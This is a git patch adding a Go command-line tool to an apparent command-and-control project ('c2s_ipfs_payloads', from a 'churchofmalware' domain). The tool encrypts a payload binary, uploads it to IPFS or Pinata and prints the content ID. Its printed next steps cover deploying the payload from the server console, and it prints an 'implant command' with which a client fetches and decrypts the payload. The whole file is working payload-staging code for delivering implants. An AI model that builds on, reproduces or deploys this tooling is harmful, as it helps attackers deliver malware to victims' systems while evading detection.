From 6d668124ed80ba84ff0db4bdc5da566cd3b407ba Mon Sep 17 00:00:00 2001
From: ek0ms savi0r <ek0mssavi0r@noreply.git.churchofmalware.org>
Date: Tue, 2 Jun 2026 06:03:19 +0000
Subject: [PATCH] Upload files to "c2s_ipfs_payloads/cmd/upload"

---
 c2s_ipfs_payloads/cmd/upload/main.go | 87 ++++++++++++++++++++++++++++
 1 file changed, 87 insertions(+)
 create mode 100644 c2s_ipfs_payloads/cmd/upload/main.go

diff --git a/c2s_ipfs_payloads/cmd/upload/main.go b/c2s_ipfs_payloads/cmd/upload/main.go
new file mode 100644
index 0000000..0e23cf1
--- /dev/null
+++ b/c2s_ipfs_payloads/cmd/upload/main.go
@@ -0,0 +1,87 @@
+// Command upload encrypts a binary, uploads it to IPFS, and prints the CID.
+//
+// Usage:
+//
+//	./upload -key <32-byte-hex-key> -file payload.bin
+//	./upload -key <key> -file payload.bin -ipfs-api http://localhost:5001/api/v0
+//	./upload -key <key> -file payload.bin -pinata-jwt <jwt>
+package main
+
+import (
+	"flag"
+	"fmt"
+	"log"
+	"os"
+	"path/filepath"
+
+	"github.com/churchofmalware/c2-ipfs-payload/pkg/crypto"
+	"github.com/churchofmalware/c2-ipfs-payload/pkg/ipfs"
+)
+
+func main() {
+	var (
+		keyHex    = flag.String("key", "", "Encryption key (32-byte hex)")
+		filePath  = flag.String("file", "", "Payload file to encrypt and upload")
+		ipfsAPI   = flag.String("ipfs-api", "http://127.0.0.1:5001/api/v0", "IPFS API URL")
+		pinataJWT = flag.String("pinata-jwt", "", "Pinata.cloud JWT (alternative upload)")
+		noUpload  = flag.Bool("no-upload", false, "Only encrypt locally, skip IPFS")
+		output    = flag.String("output", "", "Output file (default: <file>.enc)")
+	)
+	flag.Parse()
+
+	if *keyHex == "" {
+		log.Fatal("--key is required (32-byte hex key)")
+	}
+	if *filePath == "" {
+		log.Fatal("--file is required")
+	}
+
+	data, err := os.ReadFile(*filePath)
+	if err != nil {
+		log.Fatalf("Failed to read payload file: %v", err)
+	}
+
+	key, err := crypto.HexToKey(*keyHex)
+	if err != nil {
+		log.Fatalf("Invalid key: %v", err)
+	}
+
+	encrypted, err := crypto.Encrypt(data, key)
+	if err != nil {
+		log.Fatalf("Encryption failed: %v", err)
+	}
+
+	outFile := *output
+	if outFile == "" {
+		base := filepath.Base(*filePath)
+		outFile = base + ".enc"
+	}
+
+	if err := os.WriteFile(outFile, encrypted, 0644); err != nil {
+		log.Fatalf("Failed to write encrypted file: %v", err)
+	}
+	fmt.Printf("✅ Encrypted payload saved: %s (%d bytes)\n", outFile, len(encrypted))
+
+	if *noUpload {
+		fmt.Println("Skipping IPFS upload (-no-upload flag)")
+		fmt.Println("\nManual steps:")
+		fmt.Println("  1. ipfs add", outFile)
+		fmt.Println("  2. Use the CID: cid <cid>")
+		return
+	}
+
+	client := ipfs.NewClient(*ipfsAPI, *pinataJWT)
+	resp, err := client.Upload(encrypted, filepath.Base(outFile))
+	if err != nil {
+		log.Fatalf("IPFS upload failed: %v\n", err)
+	}
+
+	fmt.Printf("✅ Uploaded to IPFS!\n")
+	fmt.Printf("   CID: %s\n", resp.CID)
+	fmt.Printf("   Size: %d bytes\n", len(encrypted))
+	fmt.Println("\nNext steps:")
+	fmt.Println("  1. On the server console, run: cid", resp.CID)
+	fmt.Println("  2. Or deploy directly: deploy", *filePath)
+	fmt.Println("\nImplant command:")
+	fmt.Printf("   ./client --cid-source <hub-url> --decryption-key %s\n", *keyHex)
+}